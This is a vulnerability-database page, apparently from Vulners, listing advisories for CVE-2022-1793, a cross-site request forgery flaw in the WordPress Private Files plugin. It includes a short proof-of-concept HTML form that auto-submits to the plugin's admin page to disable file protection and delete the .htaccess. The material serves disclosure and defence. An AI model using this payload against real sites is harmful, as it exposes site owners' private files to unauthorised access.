Private Files Protection Vulnerabilit
Reporter | Title | Published | Views | Family All 7 |
---|---|---|---|---|
![]() | Private Files <= 0.40 - Protection Disabling via CSRF | 23 May 202200:00 | โ | wpvulndb |
![]() | CVE-2022-1793 | 13 Jun 202213:15 | โ | cve |
![]() | CVE-2022-1793 Private Files <= 0.40 - Protection Disabling via CSRF | 13 Jun 202212:43 | โ | cvelist |
![]() | CVE-2022-1793 | 13 Jun 202213:15 | โ | nvd |
![]() | WordPress Private Files plugin cross-site request forgery vulnerability | 15 Jun 202200:00 | โ | cnvd |
![]() | Cross site request forgery (csrf) | 13 Jun 202213:15 | โ | prion |
![]() | WordPress Private Files plugin <= 0.40 - Protection Disabling via Cross-Site Request Forgery (CSRF) vulnerability | 23 May 202200:00 | โ | patchstack |
<form id="test" action="https://example.com/wp-admin/tools.php?page=privatefiles.php" method="POST">
<input type="text" name="level" value="-1">
<input type="text" name="unprotect" value="Unprotect">
<input type="text" name="submit" value="true">
</form>
<script>
document.getElementById("test").submit();
</script>
That will also delete the .htaccess
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo